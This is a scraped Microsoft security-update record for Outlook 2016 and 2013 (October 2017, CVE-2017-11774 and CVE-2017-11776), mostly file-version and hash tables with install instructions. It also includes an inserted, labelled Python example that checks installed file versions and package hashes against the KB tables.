| outllibr.dll_1026 | outllibr.dll | 16.0.4570.1000 | 7568616 | 13-Sep-17 | 11:35 |
| mapir.dll_1029 | mapir.dll | 16.0.4483.1000 | 1292512 | 13-Sep-17 | 11:35 |
| outllibr.dll_1029 | outllibr.dll | 16.0.4570.1000 | 7585512 | 13-Sep-17 | 11:35 |
| mapir.dll_1030 | mapir.dll | 16.0.4483.1000 | 1297632 | 13-Sep-17 | 11:35 |
| outllibr.dll_1030 | outllibr.dll | 16.0.4570.1000 | 7513320 | 13-Sep-17 | 11:35 |
| mapir.dll_1031 | mapir.dll | 16.0.4483.1000 | 1346272 | 13-Sep-17 | 11:35 |
| outllibr.dll_1031 | outllibr.dll | 16.0.4570.1000 | 7604456 | 13-Sep-17 | 11:35 |
| mapir.dll_1032 | mapir.dll | 16.0.4483.1000 | 1368288 | 13-Sep-17 | 11:35 |
| outllibr.dll_1032 | outllibr.dll | 16.0.4570.1000 | 7634152 | 13-Sep-17 | 11:35 |
| mapir.dll_3082 | mapir.dll | 16.0.4483.1000 | 1334496 | 13-Sep-17 | 11:35 |
| outllibr.dll_3082 | outllibr.dll | 16.0.4570.1000 | 7555816 | 13-Sep-17 | 11:35 |
| mapir.dll_1061 | mapir.dll | 16.0.4483.1000 | 1276640 | 13-Sep-17 | 11:35 |
| outllibr.dll_1061 | outllibr.dll | 16.0.4570.1000 | 7502056 | 13-Sep-17 | 11:35 |
| mapir.dll_1035 | mapir.dll | 16.0.4483.1000 | 1291488 | 13-Sep-17 | 11:35 |
| outllibr.dll_1035 | outllibr.dll | 16.0.4570.1000 | 7522024 | 13-Sep-17 | 11:35 |
| mapir.dll_1036 | mapir.dll | 16.0.4483.1000 | 1346784 | 13-Sep-17 | 11:35 |
| outllibr.dll_1036 | outllibr.dll | 16.0.4570.1000 | 7594216 | 13-Sep-17 | 11:35 |
| mapir.dll_1037 | mapir.dll | 16.0.4483.1000 | 1237216 | 13-Sep-17 | 11:35 |
| outllibr.dll_1037 | outllibr.dll | 16.0.4570.1000 | 7462120 | 13-Sep-17 | 11:35 |
| mapir.dll_1081 | mapir.dll | 16.0.4483.1000 | 1295072 | 13-Sep-17 | 11:35 |
| outllibr.dll_1081 | outllibr.dll | 16.0.4570.1000 | 7578856 | 13-Sep-17 | 11:35 |
| mapir.dll_1050 | mapir.dll | 16.0.4483.1000 | 1301216 | 13-Sep-17 | 11:35 |
| outllibr.dll_1050 | outllibr.dll | 16.0.4570.1000 | 7528680 | 13-Sep-17 | 11:35 |
| mapir.dll_1038 | mapir.dll | 16.0.4483.1000 | 1305312 | 13-Sep-17 | 11:35 |
| outllibr.dll_1038 | outllibr.dll | 16.0.4570.1000 | 7592168 | 13-Sep-17 | 11:35 |
| mapir.dll_1057 | mapir.dll | 16.0.4483.1000 | 1291488 | 13-Sep-17 | 11:35 |
| outllibr.dll_1057 | outllibr.dll | 16.0.4570.1000 | 7506152 | 13-Sep-17 | 11:35 |
| mapir.dll_1040 | mapir.dll | 16.0.4483.1000 | 1321184 | 13-Sep-17 | 11:35 |
| outllibr.dll_1040 | outllibr.dll | 16.0.4570.1000 | 7547624 | 13-Sep-17 | 11:35 |
| mapir.dll_1041 | mapir.dll | 16.0.4549.1000 | 1170656 | 13-Sep-17 | 11:35 |
| outllibr.dll_1041 | outllibr.dll | 16.0.4570.1000 | 7518952 | 13-Sep-17 | 11:35 |
| mapir.dll_1087 | mapir.dll | 16.0.4483.1000 | 1294560 | 13-Sep-17 | 11:35 |
| outllibr.dll_1087 | outllibr.dll | 16.0.4570.1000 | 7590120 | 13-Sep-17 | 11:35 |
| mapir.dll_1042 | mapir.dll | 16.0.4483.1000 | 1162464 | 13-Sep-17 | 11:35 |
| outllibr.dll_1042 | outllibr.dll | 16.0.4570.1000 | 7498984 | 13-Sep-17 | 11:35 |
| mapir.dll_1063 | mapir.dll | 16.0.4483.1000 | 1299680 | 13-Sep-17 | 11:35 |
| outllibr.dll_1063 | outllibr.dll | 16.0.4570.1000 | 7560936 | 13-Sep-17 | 11:35 |
| mapir.dll_1062 | mapir.dll | 16.0.4483.1000 | 1292512 | 13-Sep-17 | 11:35 |
| outllibr.dll_1062 | outllibr.dll | 16.0.4570.1000 | 7551720 | 13-Sep-17 | 11:35 |
| mapir.dll_1086 | mapir.dll | 16.0.4483.1000 | 1294048 | 13-Sep-17 | 11:35 |
| outllibr.dll_1086 | outllibr.dll | 16.0.4570.1000 | 7514856 | 13-Sep-17 | 11:35 |
| mapir.dll_1044 | mapir.dll | 16.0.4483.1000 | 1280736 | 13-Sep-17 | 11:35 |
| outllibr.dll_1044 | outllibr.dll | 16.0.4570.1000 | 7503592 | 13-Sep-17 | 11:35 |
| mapir.dll_1043 | mapir.dll | 16.0.4483.1000 | 1325792 | 13-Sep-17 | 11:35 |
| outllibr.dll_1043 | outllibr.dll | 16.0.4570.1000 | 7551208 | 13-Sep-17 | 11:35 |
| mapir.dll_1045 | mapir.dll | 16.0.4483.1000 | 1319648 | 13-Sep-17 | 11:35 |
| outllibr.dll_1045 | outllibr.dll | 16.0.4570.1000 | 7591656 | 13-Sep-17 | 11:35 |
| mapir.dll_1046 | mapir.dll | 16.0.4561.1000 | 1317088 | 13-Sep-17 | 11:35 |
| outllibr.dll_1046 | outllibr.dll | 16.0.4588.1000 | 7479016 | 13-Sep-17 | 11:35 |
| mapir.dll_2070 | mapir.dll | 16.0.4483.1000 | 1328352 | 13-Sep-17 | 11:35 |
| outllibr.dll_2070 | outllibr.dll | 16.0.4570.1000 | 7553256 | 13-Sep-17 | 11:35 |
| mapir.dll_1048 | mapir.dll | 16.0.4483.1000 | 1309408 | 13-Sep-17 | 11:35 |
| outllibr.dll_1048 | outllibr.dll | 16.0.4570.1000 | 7590632 | 13-Sep-17 | 11:35 |
| mapir.dll_1049 | mapir.dll | 16.0.4483.1000 | 1296608 | 13-Sep-17 | 11:35 |
| outllibr.dll_1049 | outllibr.dll | 16.0.4600.1000 | 7555800 | 14-Sep-17 | 01:12 |
| mapir.dll_1051 | mapir.dll | 16.0.4483.1000 | 1308896 | 13-Sep-17 | 11:35 |
| outllibr.dll_1051 | outllibr.dll | 16.0.4570.1000 | 7600872 | 13-Sep-17 | 11:35 |
| mapir.dll_1060 | mapir.dll | 16.0.4483.1000 | 1295072 | 13-Sep-17 | 11:35 |
| outllibr.dll_1060 | outllibr.dll | 16.0.4570.1000 | 7544040 | 13-Sep-17 | 11:35 |
| mapir.dll_2074 | mapir.dll | 16.0.4444.1000 | 1302752 | 13-Sep-17 | 11:35 |
| outllibr.dll_2074 | outllibr.dll | 16.0.4561.1000 | 7538920 | 13-Sep-17 | 11:35 |
| mapir.dll_9242 | mapir.dll | 16.0.4483.1000 | 1302752 | 13-Sep-17 | 11:36 |
| outllibr.dll_9242 | outllibr.dll | 16.0.4570.1000 | 7539432 | 13-Sep-17 | 11:35 |
| mapir.dll_1053 | mapir.dll | 16.0.4483.1000 | 1285344 | 13-Sep-17 | 11:36 |
| outllibr.dll_1053 | outllibr.dll | 16.0.4570.1000 | 7510760 | 13-Sep-17 | 11:36 |
| mapir.dll_1054 | mapir.dll | 16.0.4483.1000 | 1274080 | 13-Sep-17 | 11:36 |
| outllibr.dll_1054 | outllibr.dll | 16.0.4570.1000 | 7542504 | 13-Sep-17 | 11:36 |
| mapir.dll_1055 | mapir.dll | 16.0.4483.1000 | 1280224 | 13-Sep-17 | 11:36 |
| outllibr.dll_1055 | outllibr.dll | 16.0.4570.1000 | 7570152 | 13-Sep-17 | 11:36 |
| mapir.dll_1058 | mapir.dll | 16.0.4483.1000 | 1299680 | 13-Sep-17 | 11:36 |
| outllibr.dll_1058 | outllibr.dll | 16.0.4570.1000 | 7561960 | 13-Sep-17 | 11:36 |
| mapir.dll_1066 | mapir.dll | 16.0.4483.1000 | 1289440 | 13-Sep-17 | 11:36 |
| outllibr.dll_1066 | outllibr.dll | 16.0.4570.1000 | 7579880 | 13-Sep-17 | 11:36 |
| mapir.dll_2052 | mapir.dll | 16.0.4483.1000 | 1118432 | 13-Sep-17 | 11:36 |
| outllibr.dll_2052 | outllibr.dll | 16.0.4570.1000 | 7423208 | 13-Sep-17 | 11:36 |
| mapir.dll_1028 | mapir.dll | 16.0.4483.1000 | 1121504 | 13-Sep-17 | 11:36 |
| outllibr.dll_1028 | outllibr.dll | 16.0.4570.1000 | 7428840 | 13-Sep-17 | 11:36 |
| intldate.dll_0001 | intldate.dll | 16.0.4549.1000 | 128256 | 12-Sep-17 | 10:31 |
| outlook.hol_1033 | outlook.hol | | 1335562 | 12-Sep-17 | 10:31 |
| omsmain.dll | omsmain.dll | 16.0.4588.1000 | 1004296 | 12-Sep-17 | 10:31 |
| omsxp32.dll | omsxp32.dll | 16.0.4588.1000 | 352048 | 12-Sep-17 | 10:31 |
| mapir.dll_1033 | mapir.dll | 16.0.4444.1000 | 1280736 | 12-Sep-17 | 10:31 |
| outllibr.dll_1033 | outllibr.dll | 16.0.4561.1000 | 7492328 | 12-Sep-17 | 10:31 |
| cnfnot32.exe_0004 | cnfnot32.exe | 16.0.4498.1000 | 232128 | 12-Sep-17 | 10:31 |
| contab32.dll | contab32.dll | 16.0.4600.1000 | 201464 | 14-Sep-17 | 01:02 |
| dlgsetp.dll | dlgsetp.dll | 16.0.4561.1000 | 138472 | 12-Sep-17 | 10:31 |
| emsmdb32.dll_0005 | emsmdb32.dll | 16.0.4600.1000 | 6173568 | 14-Sep-17 | 01:02 |
| envelope.dll | envelope.dll | 16.0.4600.1000 | 249096 | 14-Sep-17 | 01:02 |
| exsec32.dll_0001 | exsec32.dll | 16.0.4600.1000 | 432288 | 14-Sep-17 | 01:02 |
| mapiph.dll | mapiph.dll | 16.0.4540.1000 | 481088 | 12-Sep-17 | 10:31 |
| mimedir.dll | mimedir.dll | 16.0.4600.1000 | 601280 | 14-Sep-17 | 01:02 |
| mspst32.dll_0004 | mspst32.dll | 16.0.4600.1000 | 2197352 | 14-Sep-17 | 01:02 |
| olmapi32.dll | olmapi32.dll | 16.0.4600.1000 | 6615296 | 14-Sep-17 | 01:02 |
| outlmime.dll | outlmime.dll | 16.0.4600.1000 | 783632 | 14-Sep-17 | 01:02 |
| outlook.exe | outlook.exe | 16.0.4600.1000 | 34971336 | 14-Sep-17 | 01:02 |
| outlph.dll | outlph.dll | 16.0.4375.1000 | 429360 | 12-Sep-17 | 10:31 |
| outlvba.dll | outlvba.dll | 16.0.4600.1000 | 97016 | 14-Sep-17 | 01:02 |
| outlvbs.dll_0001 | outlvbs.dll | 16.0.4600.1000 | 92904 | 14-Sep-17 | 01:02 |
| pstprx32.dll | pstprx32.dll | 16.0.4600.1000 | 2576592 | 14-Sep-17 | 01:02 |
| rm.dll | rm.dll | 16.0.4444.1000 | 110800 | 12-Sep-17 | 10:31 |
| scnpst32.dll | scnpst32.dll | 16.0.4561.1000 | 611168 | 12-Sep-17 | 10:31 |
| scnpst64.dll | scnpst64.dll | 16.0.4561.1000 | 614248 | 12-Sep-17 | 10:31 |
| scnpst64c.dll | scnpst64c.dll | 16.0.4561.1000 | 814456 | 12-Sep-17 | 10:31 |
| olappt.fae | olappt.fae | | 134480 | 12-Sep-17 | 10:31 |

### Record metadata

* ID: KB4011162 (type: mskb; bulletin family: microsoft)
* Title: Description of the security update for Outlook 2016: October 10, 2017
* URL: https://support.microsoft.com/en-us/help/4011162
* Published: 2017-10-10T07:00:00; modified: 2017-10-10T07:00:00
* CVEs: CVE-2017-11774, CVE-2017-11776
* CVSS v3.0: base score 7.8 (HIGH), vector CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H; exploitability subscore 1.8, impact subscore 5.9
* CVSS v2.0: base score 6.8 (MEDIUM), vector AV:N/AC:M/Au:N/C:P/I:P/A:P; exploitability subscore 8.6, impact subscore 6.4; user interaction required; no privileges obtained

# KB4011178: security update for Outlook 2013 (October 10, 2017)

_Record last seen: 2023-06-25T10:46:55_

## Summary

This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>) and [Microsoft Common Vulnerabilities and Exposures CVE-2017-11776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11776>).

**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft Office 2013](<http://support.microsoft.com/kb/2817430>) installed on the computer. Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2013. It doesn't apply to the Office 2013 Click-to-Run editions, such as Microsoft Office 365 Home.
(See Determining your Office version.)\n\n## Improvements and fixes\n\nThis security update contains the following improvements and fixes:\n\n * When you use the **Select All** button to select all items in the **Recover Deleted Items** dialog box in a non-English version of Microsoft Outlook 2013, no items are selected.\n * Outlook will not connect by using MAPI/HTTP if the client receives certain HTTP headers that have unexpected casing.\n * When you try to connect to the address book after a Microsoft Exchange failover in Outlook 2013, you receive the following error message:\n\nThe Connection to Microsoft Exchange is unavailable.\n\n * You occasionally experience an error when you try to access the address book.\n * When you change the location of a meeting and select to update the location automatically in Outlook 2013, the displayed location isn't updated for the meeting.\n * Improves some translations in the Russian 32-bit version of Outlook 2013.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011178>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB4011178 for the 32-bit version of Outlook 2013](<http://www.microsoft.com/download/details.aspx?familyid=8c8acad9-f961-45d8-83cb-10a7df2f1692>)\n * [Download the security update KB4011178 for the 64-bit version of Outlook 2013](<http://www.microsoft.com/download/details.aspx?familyid=fe45d51d-19e6-4474-88c2-5bfb8c6c6bec>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 10, 2017](<https://support.microsoft.com/en-us/help/20171010>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB 4011090](<http://support.microsoft.com/kb/4011090>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \noutlook2013-kb4011178-fullfile-x64-glb.exe| BE12EB6CE997BEDD487499BE03D8D4E64146E7C5| 215FD2B0459E651A05BE5032532D000ABF398E5F392D65EBF6EFE861C0659A40 \noutlook2013-kb4011178-fullfile-x86-glb.exe| 364602710E01704EF87F23E18A0AB7753E1082FA| 3E91D0691DF3AC90620046EEE69541AB6A7A2B84FBA7A6830AF84F8EA29473EA \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
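The hash and file tables in this record are only useful if something consumes them. What follows is an added example, not code from the KB article, from Microsoft, or from the vulnerability record this page embeds: it parses the flattened pipe-separated rows exactly as they appear in the record, applies the KB's own rule that a listed file version is a minimum ("or later file attributes") rather than an exact match, and checks a downloaded package against the listed SHA-256 before it is run. The host inventory and every version that is not in the KB rows are constructed sample values; on a real Windows host you would fill the inventory from the `VersionInfo` property of the files under the Office installation directory and hash the installer with `Get-FileHash -Algorithm SHA256`.

```python
"""Check a host's Outlook 2013 files against the KB4011178 file table and
verify a downloaded package hash.  Added example, not part of the KB article
or the vulnerability record it appears in.  The KB rows are real; the host
inventory below is constructed sample data (see comments)."""
import hashlib
import hmac
from typing import Dict, Optional, Tuple

Version = Tuple[int, ...]

# Four rows copied from the x86 file table in the record above.
KB_FILE_TABLE = """\
File identifier| File name| File version| File size| Date| Time
---|---|---|---|---|---
outlook.hol_1025| outlook.hol| | 1247234| 13-Sep-17| 05:24
envelopr.dll_1025| envelopr.dll| 15.0.4442.1000| 18584| 13-Sep-17| 05:24
mapir.dll_1025| mapir.dll| 15.0.4875.1000| 1241824| 13-Sep-17| 05:24
outllibr.dll_1025| outllibr.dll| 15.0.4949.1000| 7814376| 13-Sep-17| 05:24
"""

# The "File hash information" table from the record above.
KB_HASH_TABLE = """\
Package Name| Package Hash SHA 1| Package Hash SHA 2
---|---|---
outlook2013-kb4011178-fullfile-x64-glb.exe| BE12EB6CE997BEDD487499BE03D8D4E64146E7C5| 215FD2B0459E651A05BE5032532D000ABF398E5F392D65EBF6EFE861C0659A40
outlook2013-kb4011178-fullfile-x86-glb.exe| 364602710E01704EF87F23E18A0AB7753E1082FA| 3E91D0691DF3AC90620046EEE69541AB6A7A2B84FBA7A6830AF84F8EA29473EA
"""

# Constructed inventory of one host (file identifier -> installed version).
# Versions that differ from the KB rows are invented to exercise each case.
SAMPLE_INVENTORY = {
    "outlook.hol_1025": "",                 # data file, no version resource
    "envelopr.dll_1025": "15.0.4442.1000",  # exactly the listed version
    "mapir.dll_1025": "15.0.5023.1000",     # later build than listed
    "outllibr.dll_1025": "15.0.4937.1000",  # older than listed: fix absent
}


def _cells(line: str):
    return [cell.strip() for cell in line.split("|")]


def parse_version(text: str) -> Optional[Version]:
    """'15.0.4949.1000' -> (15, 0, 4949, 1000); blank -> None (unversioned)."""
    text = text.strip()
    return tuple(int(p) for p in text.split(".")) if text else None


def version_at_least(installed: Version, required: Version) -> bool:
    """Numeric, component-wise comparison (shorter tuple padded with zeros).
    A string comparison would rank '15.0.10000.1000' below '15.0.4949.1000'."""
    width = max(len(installed), len(required))

    def pad(v: Version) -> Version:
        return v + (0,) * (width - len(v))

    return pad(installed) >= pad(required)


def parse_file_table(table: str) -> Dict[str, dict]:
    """File identifier -> {name, version, size}; header and rule rows skipped."""
    rows = {}
    for line in table.splitlines():
        c = _cells(line)
        if len(c) < 4 or c[0] in ("File identifier", "---"):
            continue
        rows[c[0]] = {"name": c[1], "version": parse_version(c[2]), "size": int(c[3])}
    return rows


def parse_hash_table(table: str) -> Dict[str, Dict[str, str]]:
    """Package file name -> {'sha1': ..., 'sha256': ...}, lower-case hex."""
    hashes = {}
    for line in table.splitlines():
        c = _cells(line)
        if len(c) != 3 or c[0] in ("Package Name", "---"):
            continue
        hashes[c[0]] = {"sha1": c[1].lower(), "sha256": c[2].lower()}
    return hashes


def check_inventory(required: Dict[str, dict], installed: Dict[str, str]) -> Dict[str, str]:
    """Per KB file: 'missing', 'unverifiable', 'ok' or 'outdated'."""
    report = {}
    for ident, row in required.items():
        if ident not in installed:
            report[ident] = "missing"
        elif row["version"] is None:
            # No version in the KB: a later update may change the size,
            # so size alone cannot prove this particular fix is present.
            report[ident] = "unverifiable"
        elif version_at_least(parse_version(installed[ident]), row["version"]):
            report[ident] = "ok"
        else:
            report[ident] = "outdated"
    return report


def verify_package(data: bytes, package: str, hashes: Dict[str, Dict[str, str]]) -> bool:
    """True only if the SHA-256 of the downloaded bytes matches the KB's value."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, hashes[package]["sha256"])


if __name__ == "__main__":
    for ident, status in check_inventory(parse_file_table(KB_FILE_TABLE), SAMPLE_INVENTORY).items():
        print(f"{ident:20s} {status}")
```

Two details matter in practice: versions are compared as integer tuples because a lexical comparison of the dotted strings misorders builds once a component grows a digit, and files the KB lists without a version (the .hol and .cfg data files) are reported as unverifiable rather than compared by size, since a later cumulative update can legitimately change their size without this fix being absent.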
Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x86-based versions of Outlook 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \noutlook.hol_1025| outlook.hol| | 1247234| 13-Sep-17| 05:24 \noutlook.hol_1026| outlook.hol| | 1416552| 13-Sep-17| 05:24 \noutlook.hol_1029| outlook.hol| | 1390126| 13-Sep-17| 05:24 \noutlook.hol_1030| outlook.hol| | 1282704| 13-Sep-17| 05:24 \noutlook.hol_1031| outlook.hol| | 1323514| 13-Sep-17| 05:24 \noutlook.hol_1032| outlook.hol| | 1496610| 13-Sep-17| 05:24 \noutlook.hol_3082| outlook.hol| | 1395042| 13-Sep-17| 05:24 \noutlook.hol_1061| outlook.hol| | 1410406| 13-Sep-17| 05:24 \noutlook.hol_1035| outlook.hol| | 1395674| 13-Sep-17| 05:24 \noutlook.hol_1036| outlook.hol| | 1362574| 13-Sep-17| 05:24 \noutlook.hol_1037| outlook.hol| | 1239978| 13-Sep-17| 05:24 \noutlook.hol_1081| outlook.hol| | 1294894| 13-Sep-17| 05:24 \noutlook.hol_1050| outlook.hol| | 1277766| 13-Sep-17| 05:24 \noutlook.hol_1038| outlook.hol| | 1367886| 13-Sep-17| 05:24 \noutlook.hol_1057| outlook.hol| | 1330364| 13-Sep-17| 05:24 \noutlook.hol_1040| outlook.hol| | 1422360| 13-Sep-17| 05:24 \noutlook.hol_1041| outlook.hol| | 884292| 13-Sep-17| 05:24 \noutlook.hol_1087| outlook.hol| | 1380728| 13-Sep-17| 05:24 \noutlook.hol_1042| outlook.hol| | 929084| 13-Sep-17| 05:24 \noutlook.hol_1063| outlook.hol| | 1459512| 13-Sep-17| 05:25 \noutlook.hol_1062| outlook.hol| | 1485582| 13-Sep-17| 05:25 \noutlook.hol_1086| outlook.hol| | 1322932| 13-Sep-17| 05:25 \noutlook.hol_1044| outlook.hol| | 1351932| 13-Sep-17| 05:25 \noutlook.hol_1043| outlook.hol| | 1390782| 13-Sep-17| 05:25 \noutlook.hol_1045| outlook.hol| | 1455940| 13-Sep-17| 05:25 \noutlook.hol_1046| outlook.hol| | 1402770| 13-Sep-17| 05:25 \noutlook.hol_2070| outlook.hol| | 1431656| 13-Sep-17| 05:25 \noutlook.hol_1048| outlook.hol| | 1379156| 13-Sep-17| 05:25 \noutlook.hol_1049| outlook.hol| | 
1369156| 13-Sep-17| 05:25 \noutlook.hol_1051| outlook.hol| | 1375134| 13-Sep-17| 05:25 \noutlook.hol_1060| outlook.hol| | 1301884| 13-Sep-17| 05:25 \noutlook.hol_2074| outlook.hol| | 1294950| 13-Sep-17| 05:25 \noutlook.hol_1053| outlook.hol| | 1273680| 13-Sep-17| 05:25 \noutlook.hol_1054| outlook.hol| | 1353176| 13-Sep-17| 05:26 \noutlook.hol_1055| outlook.hol| | 1303712| 13-Sep-17| 05:26 \noutlook.hol_1058| outlook.hol| | 1478448| 13-Sep-17| 05:26 \noutlook.hol_1066| outlook.hol| | 1583106| 13-Sep-17| 05:26 \noutlook.hol_2052| outlook.hol| | 957672| 13-Sep-17| 05:26 \noutlook.hol_1028| outlook.hol| | 1000084| 13-Sep-17| 05:26 \nactivity.cfg_1025| activity.cfg| | 984| 13-Sep-17| 05:24 \nappt.cfg_1025| appt.cfg| | 770| 13-Sep-17| 05:24 \ncnfnot.cfg_1025| cnfnot.cfg| | 296| 13-Sep-17| 05:24 \ncnfres.cfg_1025| cnfres.cfg| | 319| 13-Sep-17| 05:24 \ncontact.cfg_1025| contact.cfg| | 781| 13-Sep-17| 05:24 \ncurrency.htm_1025| currency.htm| | 635| 13-Sep-17| 05:24 \ndadshirt.htm_1025| dadshirt.htm| | 570| 13-Sep-17| 05:24 \ndistlist.cfg_1025| distlist.cfg| | 803| 13-Sep-17| 05:24 \ndoc.cfg_1025| doc.cfg| | 757| 13-Sep-17| 05:24 \nenvelopr.dll_1025| envelopr.dll| 15.0.4442.1000| 18584| 13-Sep-17| 05:24 \nexitem.cfg_1025| exitem.cfg| | 828| 13-Sep-17| 05:24 \nfaxext.ecf_1025| faxext.ecf| | 826| 13-Sep-17| 05:24 \ninfomail.cfg_1025| infomail.cfg| | 612| 13-Sep-17| 05:24 \nipm.cfg_1025| ipm.cfg| | 789| 13-Sep-17| 05:24 \njudgesch.htm_1025| judgesch.htm| | 594| 13-Sep-17| 05:24 \njungle.htm_1025| jungle.htm| | 600| 13-Sep-17| 05:24 \nmapir.dll_1025| mapir.dll| 15.0.4875.1000| 1241824| 13-Sep-17| 05:24 \nnote.cfg_1025| note.cfg| | 781| 13-Sep-17| 05:24 \nnotebook.htm_1025| notebook.htm| | 580| 13-Sep-17| 05:24 \noffisupp.htm_1025| offisupp.htm| | 556| 13-Sep-17| 05:24 \nooftmpl.cfg_1025| ooftmpl.cfg| | 813| 13-Sep-17| 05:24 \noutllibr.dll_1025| outllibr.dll| 15.0.4949.1000| 7814376| 13-Sep-17| 05:24 \noutlperf.ini_1025| outlperf.ini| | 5060| 13-Sep-17| 05:24 \noutlwvw.dll_1025| 
outlwvw.dll| 15.0.4442.1000| 127104| 13-Sep-17| 05:24 \npmailext.ecf_1025| pmailext.ecf| | 626| 13-Sep-17| 05:24 \npost.cfg_1025| post.cfg| | 764| 13-Sep-17| 05:24 \npostit.cfg_1025| postit.cfg| | 775| 13-Sep-17| 05:24 \nrclrpt.cfg_1025| rclrpt.cfg| | 810| 13-Sep-17| 05:24 \nrecall.cfg_1025| rec.cfg| | 1210| 13-Sep-17| 05:24 \nremote.cfg_1025| remote.cfg| | 766| 13-Sep-17| 05:24 \nrepltmpl.cfg_1025| repltmpl.cfg| | 818| 13-Sep-17| 05:24 \nreport.cfg_1025| report.cfg| | 778| 13-Sep-17| 05:24 \nresend.cfg_1025| resend.cfg| | 789| 13-Sep-17| 05:24 \nrssitem.cfg_1025| rssitem.cfg| | 776| 13-Sep-17| 05:24 \nschdcncl.cfg_1025| schdcncl.cfg| | 804| 13-Sep-17| 05:24 \nschdreq.cfg_1025| schdreq.cfg| | 1183| 13-Sep-17| 05:24 \nschdresn.cfg_1025| schdresn.cfg| | 823| 13-Sep-17| 05:24 \nschdresp.cfg_1025| schdresp.cfg| | 823| 13-Sep-17| 05:24 \nschdrest.cfg_1025| schdrest.cfg| | 829| 13-Sep-17| 05:24 \nsecrec.cfg_1025| secrec.cfg| | 642| 13-Sep-17| 05:24 \nsecure.cfg_1025| secure.cfg| | 631| 13-Sep-17| 05:24 \nsharing.cfg_1025| sharing.cfg| | 756| 13-Sep-17| 05:24 \nsign.cfg_1025| sign.cfg| | 649| 13-Sep-17| 05:24 \nsmimee.cfg_1025| smimee.cfg| | 638| 13-Sep-17| 05:24 \nsmimes.cfg_1025| smimes.cfg| | 666| 13-Sep-17| 05:24 \ntask.cfg_1025| task.cfg| | 761| 13-Sep-17| 05:24 \ntaskacc.cfg_1025| taskacc.cfg| | 789| 13-Sep-17| 05:24 \ntaskdec.cfg_1025| taskdec.cfg| | 788| 13-Sep-17| 05:24 \ntaskreq.cfg_1025| taskreq.cfg| | 784| 13-Sep-17| 05:24 \ntaskupd.cfg_1025| taskupd.cfg| | 794| 13-Sep-17| 05:24 \ntechtool.htm_1025| techtool.htm| | 561| 13-Sep-17| 05:24 \ndadshirt.htm_1026| dadshirt.htm| | 560| 13-Sep-17| 05:24 \nmapir.dll_1026| mapir.dll| 15.0.4875.1000| 1308384| 13-Sep-17| 05:24 \noutllibr.dll_1026| outllibr.dll| 15.0.4949.1000| 8006376| 13-Sep-17| 05:24 \noutlwvw.dll_1026| outlwvw.dll| 15.0.4420.1017| 125552| 13-Sep-17| 05:24 \nenvelopr.dll_1029| envelopr.dll| 15.0.4448.1000| 19048| 13-Sep-17| 05:24 \nmapir.dll_1029| mapir.dll| 15.0.4875.1000| 1283296| 13-Sep-17| 05:24 
\noutllibr.dll_1029| outllibr.dll| 15.0.4949.1000| 7948008| 13-Sep-17| 05:24 \noutlperf.ini_1029| outlperf.ini| | 5674| 13-Sep-17| 05:24 \noutlwvw.dll_1029| outlwvw.dll| 15.0.4420.1017| 125568| 13-Sep-17| 05:24 \nactivity.cfg_1030| activity.cfg| | 1000| 13-Sep-17| 05:24 \nenvelopr.dll_1030| envelopr.dll| 15.0.4442.1000| 19112| 13-Sep-17| 05:24 \nmapir.dll_1030| mapir.dll| 15.0.4875.1000| 1288416| 13-Sep-17| 05:24 \noutllibr.dll_1030| outllibr.dll| 15.0.4949.1000| 7920360| 13-Sep-17| 05:24 \noutlwvw.dll_1030| outlwvw.dll| 15.0.4420.1017| 125568| 13-Sep-17| 05:24 \nreport.cfg_1030| report.cfg| | 790| 13-Sep-17| 05:24 \nrssitem.cfg_1030| rssitem.cfg| | 804| 13-Sep-17| 05:24 \nschdreq.cfg_1030| schdreq.cfg| | 1219| 13-Sep-17| 05:24 \nactivity.cfg_1031| activity.cfg| | 1015| 13-Sep-17| 05:24 \nappt.cfg_1031| appt.cfg| | 807| 13-Sep-17| 05:24 \ncnfnot.cfg_1031| cnfnot.cfg| | 342| 13-Sep-17| 05:24 \ncnfres.cfg_1031| cnfres.cfg| | 361| 13-Sep-17| 05:24 \ncontact.cfg_1031| contact.cfg| | 811| 13-Sep-17| 05:24 \ncurrency.htm_1031| currency.htm| | 624| 13-Sep-17| 05:24 \ndadshirt.htm_1031| dadshirt.htm| | 559| 13-Sep-17| 05:24 \ndistlist.cfg_1031| distlist.cfg| | 843| 13-Sep-17| 05:24 \ndoc.cfg_1031| doc.cfg| | 806| 13-Sep-17| 05:24 \nenvelopr.dll_1031| envelopr.dll| 15.0.4442.1000| 19608| 13-Sep-17| 05:24 \nexitem.cfg_1031| exitem.cfg| | 874| 13-Sep-17| 05:24 \nfaxext.ecf_1031| faxext.ecf| | 834| 13-Sep-17| 05:24 \ninfomail.cfg_1031| infomail.cfg| | 636| 13-Sep-17| 05:24 \nipm.cfg_1031| ipm.cfg| | 846| 13-Sep-17| 05:24 \njudgesch.htm_1031| judgesch.htm| | 583| 13-Sep-17| 05:24 